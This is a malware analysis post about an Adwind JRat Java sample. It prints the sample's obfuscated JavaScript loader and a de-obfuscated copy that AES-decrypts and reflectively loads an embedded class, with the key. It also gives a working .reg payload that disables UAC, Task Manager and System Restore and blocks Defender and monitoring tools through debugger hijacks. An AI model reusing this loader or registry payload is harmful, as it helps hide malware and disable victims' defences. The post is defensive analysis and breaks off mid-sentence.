Malware Analysis – Adwind JRat

Adwind is a Java-based Remote Access Trojan (RAT).

In this post we analyse an Adwind JRat sample.

File Name: BAC.jar

MD5: fd992b7219c34c8c2ff59174b682e3a7

SHA256: 054d36da71223e23740560755c7a5bc2717d2896b98b43805816f3c7b114f15d

File Size: 531,254 B

Static Analysis

Using PEStudio, we discovered the following:

Vendors on VirusTotal have identified the sample as Adwind.

The analysed sample is a JAR file, which can only be run by Java. JAR files package resources and the executable Java .class files into a single archive. The .class files are produced when the Java compiler converts Java source code into Java bytecode, which is executed by the JVM.

To understand the code, the JAR file needs to be decompiled back into source code.

Opening the JAR file in JD-GUI, we saw multiple class files with oddly named functions.

The resources section also contained oddly named files whose content was unreadable.

Following the links between the class files, we saw that the Catananche class has a function fans with a return type of URL. This function receives a path from the Boxing class.

Catananche class
Boxing class

The /com/dk1/prn/Haggada.hit file contains obfuscated code that looks like JavaScript.

This is further confirmed by the presence of a JavaScript return type in the Touched class file.

Following is the heavily obfuscated JavaScript code:

((‘OOOOO’+’O’+’OO’+’O’+’O’+’O’+’OOOOOO’+’kkO’+’kkkOk’+’OOkk’+’k’+’kO =’+’ j’+’av’+’a’+’.l’+’ang’+’.By’+’te[(\’’+’T\’+\’’+’Y’+’\’+\’’+’P\’+’+’\’’+’E\’’+’)’+’]; ‘+’O’+’OOOOOOO’+’OOOO’+’OOOO’+’OOi’+’i’+’i’+’O’+’iO’+’iOO’+’OiiiO’+’=(\’’+’qua\’+’+’\’.’+’e\’’+’+’+’\’nt’+’e\’’+’+\’rp’+’\’+’+’\’r\’+’+’\’ise\’’+’+\’.\’+’+’\’’+’r\’’+’+\’ea’+’\’’+’+\’q\’+’+’\’’+’t’+’o’+’\’’+’+\’r\’’+’+\’.’+’r\’+\’ea’+’qt\’+’+’\’i\’+\’o’+’\’+\’n’+’s\’+’+’\’.s’+’\’+’+’\’’+’ta’+’n\’+\’d’+’ar\’+\’tb’+’o\’+\’’+’o\’’+’+’+’\’’+’ts\’+\’’+’tr\’’+’+\’’+’a\’+\’’+’p.’+’H\’+\’’+’ea\’+’+’\’der\’’+’); MM’+’MMMM’+’MMMMM’+’M’+’M’+’MMMMM’+’Mk’+’Mk’+’MM’+’Mkk’+’MMk’+’k’+’M=jav’+’a.la’+’ng.Cl’+’a’+’ss[(‘+’\’fo’+’r’+’\’+\’’+’N’+’a’+’me\’’+’)]’+’(‘+’(\’com’+’.d\’+\’’+’k’+’l\’+\’’+’.pr\’+’+’\’n’+’.Fr’+’\’’+’+’+’\’’+’uc’+’\’’+’+’+’\’t’+’ose\’’+’)’+’); ‘+’JJ’+’JJ’+’JoJJ’+’JJ’+’ooo’+’=’+’MMMMM’+’MMMMM’+’M’+’M’+’MMMMM’+’MMkMk’+’MM’+’M’+’k’+’kMM’+’kkM[(\’’+’g’+’\’+’+’\’e\’’+’+\’t’+’\’’+’+\’C\’+\’’+’l’+’\’+’+’\’a\’’+’+\’s\’+\’’+’s\’+\’’+’L\’+\’o’+’\’+\’’+’a\’+\’d’+’\’’+’+’+’\’e\’+\’’+’r\’)]’+’(‘+’);’+’ ‘+’OOOOO’+’OOOOO’+’O’+’OOO’+’OO’+’Ommmm’+’mOmmm’+’mmOm’+’Om’+’=fun’+’ct’+’ion(M’+’MMMMM’+’MMM’+’MMMMMM’+’M’+’MM’+’kMMkMM’+’kkkkMM’+’kk)’+’{ Ko’+’KooKK’+’KKK’+’KKK’+’K=’+’M’+’MM’+’MMM’+’M’+’MMMMM’+’MMM’+’MMMk’+’MMk’+’MMk’+’kk’+’kMM’+’kk[0]’+’;’+’ OO’+’OOOO’+’OO’+’OO’+’OOOO’+’O’+’O’+’OiiOi’+’Oii’+’O’+’ii’+’iOi’+’Oi=M’+’MM’+’MM’+’MMMM’+’MMMM’+’MMM’+’M’+’MkMMkM’+’Mkkk’+’kMMkk[1'+’]; JJ’+’JJ’+’JJJ’+’JJJ’+’JJJJ’+’JJJJ’+’JjJJ’+’jjj’+’jJjjj’+’J’+’j=K’+’oK’+’ooK’+’KK’+’KK’+’KKKK+’+’(\’.\’’+’)’+’+O’+’OOOO’+’OOOOO’+’OOO’+’O’+’OOOi’+’iOi’+’O’+’iiOii’+’iOi’+’Oi; Mi’+’iiMii’+’MiM’+’iii’+’i’+’M=MMM’+’M’+’M’+’M’+’MM’+’M’+’MM’+’MMMMM’+’MM’+’k’+’MMk’+’MM’+’kkk’+’kM’+’Mkk[‘+’2]; JJ’+’JJJJ’+’J’+’JJ’+’JJJJ’+’JJJJi’+’JiJiJ’+’JJ’+’J’+’iiJiJ’+’J=Mi’+’i’+’iM’+’i’+’i’+’MiMi’+’iiiM[‘+’1]’+’;’+’ ‘+’OlO’+’OlllO’+’O’+’OOl’+’O’+’=Mii’+’iMiiM’+’iMiii’+’i’+’M’+’[2]; ‘+’JooJo’+’oJoo’+’Jo’+’oo’+’J=’+’O’+’l’+’O’+’Ol’+’llOOO’+’OlO’+’[1'+’]’+’; 
‘+’I’+’IIIIII’+’IIII’+’I’+’II’+’I’+’IImmIm’+’mIImIm’+’Immm’+’m’+’=’+’Mi’+’i’+’i’+’Mii’+’MiMi’+’i’+’iiM[3'+’]; ‘+’L’+’LLLLLL’+’LLLLL’+’LL’+’LLLLL’+’k’+’kLLkk’+’L’+’kL’+’LLkk’+’=’+’java.’+’l’+’a’+’ng’+’.ref’+’lect.’+’Ar’+’ray[(\’’+’n’+’e\’+\’’+’w’+’In’+’stan\’’+’+\’’+’ce’+’\’)](O’+’O’+’OO’+’OO’+’O’+’OOOOO’+’OOOO’+’Okk’+’Okk’+’kOkOO’+’kkkkO’+’,Joo’+’Joo’+’J’+’oo’+’Jooo’+’J); J’+’Joo’+’ooo’+’o’+’J’+’J’+’ooooo=’+’MMMM’+’MMM’+’MMMM’+’MMM’+’M’+’M’+’MM’+’MkMk’+’MMMkk’+’M’+’MkkM’+’; O’+’OOO’+’OOO’+’O’+’OOOOO’+’OOO’+’O’+’jj’+’OO’+’jjj’+’OjO’+’jj’+’Ojj=’+’(\’/\’)’+’+JJJJJ’+’JJJ’+’J’+’JJ’+’JJJJ’+’JJiJi’+’J’+’iJJJ’+’JiiJi’+’JJ’+’[0];’+’ KK’+’KKKKKKK’+’KKKKK’+’K’+’KKKKK’+’KK’+’KKK’+’oKooK’+’Ko’+’=JJo’+’o’+’ooooJJ’+’oo’+’ooo[(‘+’\’ge’+’\’+\’’+’t’+’Re’+’so’+’\’+\’urc’+’e\’’+’)](‘+’O’+’OO’+’OO’+’OO’+’OOOOO’+’OO’+’OO’+’Ojj’+’OOjj’+’jOj’+’O’+’jjOj’+’j); M’+’Mjjjjjj’+’M’+’MjM’+’MMM=’+’K’+’KKKKK’+’KKKK’+’KKK’+’KKKKK’+’KK’+’KKK’+’KK’+’oKo’+’oKKo’+’[(\’op’+’en\’+\’’+’S’+’tr\’+’+’\’e\’+\’’+’a’+’\’’+’+’+’\’m\’)](‘+’); O’+’OOl’+’O’+’lOlO’+’l’+’OOO’+’O’+’O=new’+’ ‘+’java.’+’io.D’+’ata’+’Inpu’+’t’+’S’+’tream’+’(MM’+’j’+’jjjjjM’+’MjMMM’+’M); ‘+’OO’+’OlO’+’lOlO’+’l’+’OOOOO’+’[(\’r’+’ea’+’\’+\’dF’+’u\’+\’l’+’l’+’y’+’\’)](LL’+’LL’+’L’+’L’+’L’+’LL’+’LLLL’+’L’+’LLLLL’+’kkLL’+’kkLkL’+’L’+’Lkk);’+’ LL’+’LL’+’LLLL’+’LLLLLL’+’LL’+’LLmmm’+’mmL’+’LLm’+’m’+’mL’+’mL’+’=j’+’a’+’vax’+’.cryp’+’to’+’.’+’Cipher’+’[(\’g’+’\’+\’e\’’+’+\’t\’+’+’\’I\’’+’+\’n’+’\’+\’s’+’\’+’+’\’’+’t\’+\’’+’a\’+\’’+’n\’+’+’\’c’+’\’+\’e\’’+’)]((‘+’\’AES’+’\’)’+’)’+’; ‘+’III’+’IIIII’+’IIII’+’II’+’I’+’II’+’II’+’llIl’+’IIl’+’IlI’+’Ill=’+’III’+’I’+’IIII’+’IIIII’+’I’+’III’+’mmIm’+’mIImI’+’mI’+’mm’+’mm[(‘+’\’ge\’+\’t’+’B’+’\’+\’y’+’te’+’\’’+’+\’s’+’\’’+’)]((‘+’\’U’+’TF’+’-8\’))’+’;’+’ I’+’lI’+’IIlII’+’llIl’+’lll=n’+’ew ja’+’v’+’ax’+’.cr’+’y’+’pt’+’o.sp’+’ec.S’+’ecre’+’t’+’KeyS’+’pe’+’c’+’(IIII’+’III’+’IIII’+’IIIII’+’IIIl’+’lIlI’+’Il’+’IlII’+’ll,’+’ ‘+’(\’AES’+’\’));’+’ 
LL’+’LLLL’+’LL’+’LL’+’LLLL’+’LLLL’+’m’+’mmm’+’m’+’LLLmm’+’mLm’+’L[(\’i’+’n’+’it\’)]’+’(jav’+’ax’+’.cry’+’pto.’+’Cip’+’he’+’r[(\’D\’+’+’\’E\’+\’’+’C\’+’+’\’’+’R’+’\’+\’Y’+’\’’+’+\’’+’P\’+\’’+’T\’’+’+\’_\’’+’+\’’+’M\’+’+’\’O’+’\’+\’D’+’\’+\’’+’E’+’\’)],’+’ IlII’+’IlIIl’+’l’+’Illll’+’); J’+’J’+’JJJkkJ’+’J’+’k’+’JJ’+’JJJ=L’+’L’+’LL’+’LL’+’LL’+’LL’+’LL’+’LLLL’+’LLm’+’mmmm’+’LLLm’+’mmLmL[‘+’(\’’+’doF’+’\’+’+’\’ina\’’+’+\’l\’’+’)](‘+’LL’+’LL’+’LLLLL’+’LL’+’L’+’LLL’+’LLLLk’+’kLL’+’kk’+’L’+’kLLLk’+’k)’+’;’+’ III’+’IIII’+’IIIII’+’III’+’II’+’ImmIm’+’I’+’Im’+’IImm’+’m’+’Im’+’=java’+’.’+’l’+’ang.Cl’+’a’+’ss’+’Load’+’e’+’r’+’[(\’cl’+’as\’+\’s\’)’+’];’+’ Kjjj’+’jKK’+’jKj’+’jK’+’j’+’K=jav’+’a.l’+’a’+’ng’+’.Stri’+’ng[(‘+’\’cl’+’a’+’s\’+\’s’+’\’)]; I’+’I’+’ll’+’Il’+’IlIII’+’l’+’lll’+’=JJJJ’+’J’+’k’+’kJJkJ’+’JJJ’+’J[(‘+’\’’+’g\’+’+’\’e\’’+’+’+’\’t\’’+’+\’C\’’+’+\’l\’+’+’\’’+’a\’+\’s\’’+’+\’s\’’+’)](‘+’); OO’+’OOOOOO’+’OOOOO’+’O’+’OOO’+’OkOkkO’+’OO’+’OOk’+’kO’+’Ok=’+’java’+’.la’+’ng.’+’Inte’+’g’+’er[(\’T’+’YPE\’)’+’];’+’ Kiii’+’KK’+’iK’+’iiiii’+’K=III’+’III’+’IIII’+’II’+’I’+’IIII’+’ImmIm’+’IIm’+’I’+’Imm’+’m’+’I’+’m[(\’’+’g\’+\’’+’e’+’\’+\’’+’t\’+\’’+’D’+’\’’+’+\’e\’’+’+’+’\’c\’+’+’\’l\’’+’+\’a\’’+’+\’r’+’\’+’+’\’e\’+’+’\’d’+’\’’+’+\’M\’+’+’\’’+’e\’’+’+\’t’+’\’’+’+’+’\’h’+’\’+’+’\’o\’+\’d’+’\’)]((‘+’\’d\’+\’’+’ef’+’i’+’\’+\’ne\’’+’+\’Cl’+’a\’+\’’+’s’+’s\’), ‘+’K’+’jjj’+’jKKj’+’KjjK’+’jK’+’, IIllI’+’lIlII’+’Illll,’+’ OO’+’O’+’OO’+’O’+’OO’+’O’+’OOO’+’OOO’+’OOOk’+’O’+’k’+’kOOOO’+’Okk’+’OOk’+’, OOOO’+’O’+’OO’+’OOO’+’O’+’OOOO’+’OOOkO’+’k’+’kOOO’+’OOk’+’kOOk);’+’ Kii’+’iKKiK’+’iii’+’iiK’+’[(\’’+’set’+’A\’+\’’+’c\’’+’+\’c\’+’+’\’ess’+’\’’+’+\’ib’+’l\’+\’e’+’\’)]’+’(true’+’); M’+’MMMMM’+’kMMkM’+’kk’+’M’+’k=’+’ ‘+’K’+’ii’+’iKK’+’i’+’Ki’+’iii’+’iK’+’[(\’in’+’v\’’+’+\’oke’+’\’)](J’+’J’+’JJ’+’JoJJ’+’J’+’Joo’+’o,’+’ JJJ’+’JJJJ’+’JJJJ’+’J’+’J’+’JJJJJ’+’J’+’jJJjj’+’jjJ’+’jjj’+’J’+’j’+’, ‘+’J’+’JJJJ’+’kkJJ’+’kJ’+’JJJJ’+’,’+’ 0, 
J’+’JJ’+’JJ’+’kkJJ’+’kJ’+’J’+’JJJ[(‘+’\’l\’’+’+\’e’+’n’+’\’+\’g’+’th’+’\’)]); ‘+’if(‘+’OOOO’+’OOOO’+’OOOO’+’OO’+’OOOO’+’iiiOiOi’+’OOO’+’ii’+’iO=’+’=JJJJ’+’JJJJ’+’JJJJJJ’+’J’+’JJJJ’+’jJJjj’+’jjJ’+’jjjJ’+’j)’+’ ‘+’OO’+’O’+’OOOOOO’+’O’+’OOO’+’O’+’OOO’+’i’+’iOOi’+’iOiOiO’+’iiO’+’O’+’=M’+’MMM’+’MMkM’+’MkM’+’kkM’+’k; };’+’ JJJJ’+’JJJJ’+’JJJ’+’J’+’JJJJJ’+’J’+’oJo’+’ooJ’+’JooJ’+’JJJo=’+’[[‘+’(\’q\’+\’’+’ua.e’+’\’+’+’\’n\’’+’+\’te\’’+’+\’rp’+’ri’+’\’’+’+\’’+’se.\’+’+’\’’+’rea’+’\’’+’+\’qt\’’+’+’+’\’or.’+’\’+’+’\’re\’+’+’\’a’+’\’+\’’+’q\’’+’+’+’\’tio\’’+’+’+’\’n\’+\’’+’s.\’+\’’+’sta’+’n’+’\’+’+’\’d\’+’+’\’a\’’+’+\’r’+’\’+\’tb’+’oo\’+’+’\’t’+’\’’+’+\’s’+’t\’’+’+’+’\’’+’r\’+’+’\’a’+’\’+’+’\’p’+’\’),(\’’+’H\’+\’e’+’\’+’+’\’a’+’\’+\’d\’’+’+\’e’+’\’’+’+\’r\’’+’),[[(‘+’\’.’+’\’+’+’\’e’+’n’+’c\’+’+’\’r\’+’+’\’y’+’pte\’’+’+\’d\’’+’),(\’.’+’\’+\’n\’’+’+\’o\’+’+’\’t’+’\’+’+’\’-’+’\’+’+’\’s\’’+’+\’’+’p\’+\’l’+’\’+’+’\’i’+’\’+\’t\’+’+’\’t\’+’+’\’e\’’+’+\’d’+’\’’+’)’+’,(\’.’+’\’+’+’\’n\’+’+’\’o’+’t-\’’+’+\’c’+’omp\’’+’+\’’+’re\’+’+’\’sse\’’+’+\’d’+’\’),’+’(\’.’+’\’+’+’\’’+’not-\’’+’+\’fi\’’+’+’+’\’x’+’e’+’\’+’+’\’d’+’\’)],’+’[(‘+’\’co\’’+’+’+’\’’+’m\’’+’+\’/’+’dk\’+\’’+’l/’+’\’+\’’+’pr’+’n/\’’+’+\’’+’Mo’+’\’+\’u’+’\’’+’+\’rn\’’+’+’+’\’in’+’\’+’+’\’’+’g.\’+\’p\’+’+’\’op’+’\’)],’+’[‘+’5'+’204,5'+’216'+’,5204,’+’5204]’+’,(‘+’\’f\’+\’’+’9\’+\’’+’X’+’\’+\’u’+’\’+\’X’+’\’’+’+\’L’+’\’’+’+\’P\’+\’’+’c\’+\’w’+’\’+\’Z\’+’+’\’E\’’+’+\’’+’z\’+\’h’+’\’+\’B’+’\’+\’’+’t\’’+’+\’’+’n\’’+’)]]];’+’ ‘+’for(L’+’LiiL’+’L’+’iLL’+’LL’+’LLi=0'+’;L’+’L’+’ii’+’LLiLL’+’L’+’LL’+’Li’+’<J’+’JJJ’+’JJJJJ’+’JJJ’+’JJJJJ’+’J’+’oJo’+’ooJJo’+’oJJJJ’+’o[(\’l’+’en’+’g\’+’+’\’’+’t’+’h\’)’+’]’+’;LLii’+’LL’+’iL’+’L’+’L’+’L’+’LL’+’i’+’++)’+’{ ‘+’OOOO’+’OOOOO’+’OOOOOO’+’OOmm’+’mmmO’+’mm’+’mmmOm’+’Om(JJ’+’JJJJJ’+’JJJJJ’+’JJJJ’+’J’+’JoJo’+’oo’+’JJo’+’oJJJJ’+’o[L’+’Li’+’iLL’+’iLL’+’LLLLi’+’]); }’+’ 
OOOOOO’+’OO’+’OO’+’OOO’+’OOO’+’Oii’+’O’+’OiiO’+’iOiOi’+’iOO[(‘+’\’n’+’\’+’+’\’ewI’+’\’’+’+\’n’+’s\’’+’+’+’\’tan\’’+’+’+’\’’+’ce’+’\’)]()’+’;’))

De-obfuscating the code by string substitution gives the following:

// JavaScript (Nashorn) loader: reads an AES-encrypted resource from the JAR, decrypts it
// and defines the resulting class through ClassLoader.defineClass before instantiating it.
OOOOOOOOOOOOOOOOOkkOkkkOkOOkkkkO = java.lang.Byte[('TYPE')];   // byte.class, element type of the buffer
OOOOOOOOOOOOOOOOOOiiiOiOiOOOiiiO = ('qua.enterprise.reaqtor.reaqtions.standartbootstrap.Header');   // class to instantiate at the end
MMMMMMMMMMMMMMMMMMMkMkMMMkkMMkkM = java.lang.Class[('forName')](('com.dkl.prn.Fructose'));
JJJJJoJJJJooo = MMMMMMMMMMMMMMMMMMMkMkMMMkkMMkkM[('getClassLoader')]();   // class loader used for defineClass
OOOOOOOOOOOOOOOOOmmmmmOmmmmmOmOm = function(MMMMMMMMMMMMMMMMMMkMMkMMkkkkMMkk)
{
  // argument layout: [package, class name, [[extensions], [resource path], [sizes], AES key]]
  KoKooKKKKKKKKK = MMMMMMMMMMMMMMMMMMkMMkMMkkkkMMkk[0];
  OOOOOOOOOOOOOOOOOiiOiOiiOiiiOiOi = MMMMMMMMMMMMMMMMMMkMMkMMkkkkMMkk[1];
  JJJJJJJJJJJJJJJJJJJjJJjjjjJjjjJj = KoKooKKKKKKKKK + ('.') + OOOOOOOOOOOOOOOOOiiOiOiiOiiiOiOi;   // fully qualified class name
  MiiiMiiMiMiiiiM = MMMMMMMMMMMMMMMMMMkMMkMMkkkkMMkk[2];
  JJJJJJJJJJJJJJJJJiJiJiJJJJiiJiJJ = MiiiMiiMiMiiiiM[1];   // [resource path]
  OlOOlllOOOOlO = MiiiMiiMiMiiiiM[2];   // [sizes]
  JooJooJooJoooJ = OlOOlllOOOOlO[1];   // encrypted resource size (5216 = 326 AES blocks)
  IIIIIIIIIIIIIIIIImmImmIImImImmmm = MiiiMiiMiMiiiiM[3];   // AES key string
  LLLLLLLLLLLLLLLLLLLkkLLkkLkLLLkk = java.lang.reflect.Array[('newInstance')](OOOOOOOOOOOOOOOOOkkOkkkOkOOkkkkO, JooJooJooJoooJ);   // new byte[size]
  JJooooooJJooooo = MMMMMMMMMMMMMMMMMMMkMkMMMkkMMkkM;
  OOOOOOOOOOOOOOOOOjjOOjjjOjOjjOjj = ('/') + JJJJJJJJJJJJJJJJJiJiJiJJJJiiJiJJ[0];
  KKKKKKKKKKKKKKKKKKKKKKKKKoKooKKo = JJooooooJJooooo[('getResource')](OOOOOOOOOOOOOOOOOjjOOjjjOjOjjOjj);   // URL of the resource inside the JAR
  MMjjjjjjMMjMMMM = KKKKKKKKKKKKKKKKKKKKKKKKKoKooKKo[('openStream')]();
  OOOlOlOlOlOOOOO = new java.io.DataInputStream(MMjjjjjjMMjMMMM);
  OOOlOlOlOlOOOOO[('readFully')](LLLLLLLLLLLLLLLLLLLkkLLkkLkLLLkk);   // read the encrypted bytes
  LLLLLLLLLLLLLLLLLLmmmmmLLLmmmLmL = javax.crypto.Cipher[('getInstance')](('AES'));   // AES/ECB/PKCS5Padding by default
  IIIIIIIIIIIIIIIIIIIllIlIIlIlIIll = IIIIIIIIIIIIIIIIImmImmIImImImmmm[('getBytes')](('UTF-8'));
  IlIIIlIIllIllll = new javax.crypto.spec.SecretKeySpec(IIIIIIIIIIIIIIIIIIIllIlIIlIlIIll, ('AES'));
  LLLLLLLLLLLLLLLLLLmmmmmLLLmmmLmL[('init')](javax.crypto.Cipher[('DECRYPT_MODE')], IlIIIlIIllIllll);
  JJJJJkkJJkJJJJJ = LLLLLLLLLLLLLLLLLLmmmmmLLLmmmLmL[('doFinal')](LLLLLLLLLLLLLLLLLLLkkLLkkLkLLLkk);   // decrypted class bytes
  IIIIIIIIIIIIIIIIIImmImIImIImmmIm = java.lang.ClassLoader[('class')];
  KjjjjKKjKjjKjK = java.lang.String[('class')];
  IIllIlIlIIIllll = JJJJJkkJJkJJJJJ[('getClass')]();   // byte[].class
  OOOOOOOOOOOOOOOOOOkOkkOOOOOkkOOk = java.lang.Integer[('TYPE')];   // int.class
  // reflectively fetch the protected ClassLoader.defineClass(String, byte[], int, int)
  KiiiKKiKiiiiiK = IIIIIIIIIIIIIIIIIImmImIImIImmmIm[('getDeclaredMethod')](('defineClass'), KjjjjKKjKjjKjK, IIllIlIlIIIllll, OOOOOOOOOOOOOOOOOOkOkkOOOOOkkOOk, OOOOOOOOOOOOOOOOOOkOkkOOOOOkkOOk);
  KiiiKKiKiiiiiK[('setAccessible')](true);
  MMMMMMkMMkMkkMk = KiiiKKiKiiiiiK[('invoke')](JJJJJoJJJJooo, JJJJJJJJJJJJJJJJJJJjJJjjjjJjjjJj, JJJJJkkJJkJJJJJ, 0, JJJJJkkJJkJJJJJ[('length')]);
  if (OOOOOOOOOOOOOOOOOOiiiOiOiOOOiiiO == JJJJJJJJJJJJJJJJJJJjJJjjjjJjjjJj)
    OOOOOOOOOOOOOOOOOiiOOiiOiOiOiiOO = MMMMMMkMMkMkkMk;   // remember the defined Header class
};
JJJJJJJJJJJJJJJJJJoJoooJJooJJJJo = [[('qua.enterprise.reaqtor.reaqtions.standartbootstrap'), ('Header'), [[('.encrypted'), ('.not-splitted'), ('.not-compressed'), ('.not-fixed')], [('com/dkl/prn/Mourning.pop')], [5204, 5216, 5204, 5204], ('f9XuXLPcwZEzhBtn')]]];
for (LLiiLLiLLLLLLi = 0; LLiiLLiLLLLLLi < JJJJJJJJJJJJJJJJJJoJoooJJooJJJJo[('length')]; LLiiLLiLLLLLLi++)
{
  OOOOOOOOOOOOOOOOOmmmmmOmmmmmOmOm(JJJJJJJJJJJJJJJJJJoJoooJJooJJJJo[LLiiLLiLLLLLLi]);
}
OOOOOOOOOOOOOOOOOiiOOiiOiOiOiiOO[('newInstance')]();   // instantiate the decrypted Header class

Skimming through the code, we observe:

  • javax.crypto.Cipher is used with AES, so AES encryption/decryption of an embedded resource is involved
  • It also accesses the file com/dkl/prn/Mourning.pop
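To reproduce the loader's resource-decryption step as an analyst, the following added example (Go, not code from the post or from the sample) applies the key and padding convention the de-obfuscated code uses to a stand-in resource and checks the result for the class-file magic. The key and resource name come from the code above; the encrypted bytes are constructed here rather than taken from the real JAR.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/binary"
	"fmt"
)

const adwindKey = "f9XuXLPcwZEzhBtn" // key recovered from the de-obfuscated loader (16 bytes = AES-128)

// Java's Cipher.getInstance("AES") is AES/ECB/PKCS5Padding, so the loader's doFinal() is
// block-by-block ECB decryption followed by PKCS#5 unpadding; this does the same.
func decryptAdwindResource(blob []byte, key string) ([]byte, error) {
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return nil, err
	}
	if len(blob) == 0 || len(blob)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("ciphertext length %d is not a whole number of AES blocks", len(blob))
	}
	plain := make([]byte, len(blob))
	for i := 0; i < len(blob); i += aes.BlockSize {
		block.Decrypt(plain[i:i+aes.BlockSize], blob[i:i+aes.BlockSize])
	}
	// Validate the padding instead of trusting it: a wrong key or a damaged resource shows up here.
	pad := int(plain[len(plain)-1])
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(plain[len(plain)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, fmt.Errorf("bad PKCS#5 padding: wrong key or corrupted resource")
	}
	return plain[:len(plain)-pad], nil
}

// isClassFile checks for the 0xCAFEBABE magic that bytes handed to defineClass must start with.
func isClassFile(b []byte) bool {
	return len(b) >= 4 && binary.BigEndian.Uint32(b) == 0xCAFEBABE
}

// encryptForSample is the inverse operation, used only to build the constructed input below.
func encryptForSample(plain []byte, key string) []byte {
	block, _ := aes.NewCipher([]byte(key))
	pad := aes.BlockSize - len(plain)%aes.BlockSize
	padded := append(append([]byte{}, plain...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	out := make([]byte, len(padded))
	for i := 0; i < len(padded); i += aes.BlockSize {
		block.Encrypt(out[i:i+aes.BlockSize], padded[i:i+aes.BlockSize])
	}
	return out
}

// constructedResource stands in for com/dkl/prn/Mourning.pop: a fake class-file header
// (magic, minor 0, major 52 = Java 8) plus filler bytes, not the real payload.
var constructedResource = encryptForSample(
	append([]byte{0xCA, 0xFE, 0xBA, 0xBE, 0, 0, 0, 0x34}, bytes.Repeat([]byte{0x41}, 21)...), adwindKey)
```

On the real sample the resource extracted from the JAR would be 5216 bytes (326 blocks) and should decrypt to the 5204-byte class the size table announces.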

Behavioral Analysis

On execution of the sample, the following is observed:

  • The JAR file drops multiple .class files into the AppData\Local\Temp folder
  • The JAR file drops multiple .vbs files into the AppData\Local\Temp folder. cscript is used to execute them, and they are deleted after execution
  • xcopy is used to copy the contents of the Java JRE from C:\Program Files\Java\jre1.8.0_191 into C:\Users\Lizol\AppData\Roaming\Oracle\
Destination of the xcopy operation
  • A registry key TnIOJsNUCKX is added under CurrentVersion\Run. This key points to an execution path
  • The folder TKqPJhHHoic is then hidden using the attrib command:
attrib +h "C:\Users\Lizol\TKqPJhHHoic\*.*"
  • The file .jar.jChWSA is then executed:

C:\Users\Lizol\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Lizol\TKqPJhHHoic\.jar.jChWSA

  • regedit is then executed against a .reg file, silently importing its contents into the registry:
regedit.exe /s C:\Users\Lizol\AppData\Local\Temp\lfTQsdJPKb4003450082576532965.reg
  • Analysing the contents of lfTQsdJPKb4003450082576532965.reg, we see the following:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-
[HKEY_CURRENT_USER\Environment]
"SEE_MASK_NOZONECHECKS"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
"SEE_MASK_NOZONECHECKS"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000000
"ConsentPromptBehaviorUser"=dword:00000000
"EnableLUA"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe]
"debugger"="svchost.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
"DisableConfig"=dword:00000001
"DisableSR"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe]
  • The .reg file targets monitoring and security applications, setting svchost.exe as their debugger under Image File Execution Options so that launching any of them starts svchost.exe instead
  • It also disables Task Manager and System Restore
  • It then runs taskkill against all the process names mapped in the .reg file
  • taskkill forcefully terminates these processes and their child processes
  • Netmon shows no network activity for any of the above processes. DNS requests were sent to the following domain:

